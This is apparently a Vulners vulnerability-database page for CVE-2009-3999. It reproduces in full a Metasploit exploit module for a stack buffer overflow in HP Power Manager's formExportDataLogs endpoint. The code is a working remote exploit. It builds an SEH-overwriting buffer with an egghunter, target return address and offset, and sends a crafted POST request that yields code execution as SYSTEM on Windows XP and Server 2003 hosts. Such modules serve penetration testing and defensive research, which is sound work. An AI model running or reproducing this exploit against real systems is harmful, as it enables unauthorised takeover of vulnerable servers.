Lucene search
K

HP Power Manager 'formExportDataLogs' Buffer Overflow

🗓️ 20 Oct 2011 17:29:48Reported by Alin Rad Pop, Rodrigo Escobar <[email protected]>, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 14 Views

HP Power Manager 'formExportDataLogs' Buffer Overflow. Stack-based buffer overflow in HP Power Manager causing arbitrary remote code execution under 'SYSTEM' context

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'            => "HP Power Manager 'formExportDataLogs' Buffer Overflow",
      'Description'     => %q{
          This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.
        By creating a malformed request specifically for the fileName parameter, a stack-based
        buffer overflow occurs due to a long error message (which contains the fileName),
        which may result in arbitrary remote code execution under the context of 'SYSTEM'.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          # Original discovery (Secunia Research)
          'Alin Rad Pop',
          # Metasploit module (thx DcLabs members, corelanc0d3r, humble-desser, Jason Kratzer)
          'Rodrigo Escobar <ipax[at]dclabs.com.br>',
          # Metasploit fu
          'sinn3r'
        ],
      'References'      =>
        [
          [ 'CVE', '2009-3999' ],
          [ 'OSVDB', '61848'],
          [ 'BID', '37867' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'        => 'win',
      'Payload'         =>
        {
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",
          'DisableNops' => true,
          'EncoderOptions' => {'BufferRegister' => 'EDI' }  # Egghunter jmp edi
        },
      'Targets'         =>
        [
          [
            # Tested on HP Power Manager 4.2 (Build 7 and 9)
            'Windows XP SP3 / Win Server 2003 SP0',
            {
              'Ret'    => 0x004174d5,  #pop esi # pop ebx # ret 10 (DevManBE.exe)
              'Offset' => 721
            }
          ]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => '2011-10-19',
      'DefaultTarget'   => 0))
  end

  def exploit
    print_status("Generating payload...")

    # Randomize the tag by not specifying one
    eggoptions = { :checksum => true }

    hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    buffer  = rand_text_alpha_upper(target['Offset'] - hunter.length)
    buffer << make_nops(30) + hunter
    buffer << "\xeb\xc2\x90\x90"           #JMP SHORT 0xC2
    buffer << [target.ret].pack('V*')[0,3] #SEH (strip the null byte, HP PM will pad it for us)

    # Let's make the request a little bit more realistic looking
    time = Time.new

    print_status("Trying target #{target.name}...")
    connect

    request = send_request_cgi({
      'method'    => 'POST',
      'uri'       => '/goform/formExportDataLogs',
      'vars_post' => {
        'dataFormat' => 'comma',
        'exportto'   => 'file',
        'fileName'   => buffer,
        'bMonth'     => "%02d" %time.month,
        'bDay'       => "%02d" %time.day,
        'bYear'      => time.year.to_s,
        'eMonth'     => "%02d" %time.month,
        'eDay'       => "%02d" %time.day,
        'eYear'      => time.year.to_s,
        'LogType'    => 'Application',
        'actionType' => '1%3B'
      },
      'headers' =>
        {
          'Accept'  => egg,
          'Referer' => "http://#{rhost}/Contents/exportLogs.asp?logType=Application"
        }
    }, 5)

    print_status("Payload sent! Go grab a coffee, the CPU is gonna work hard for you! :)")

    # Wait for a bit longer. For some reason it may take some time for the process to start
    # handling our request.
    select(nil, nil, nil, 7)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
10High risk
Vulners AI Score10
CVSS 210
EPSS0.71807
14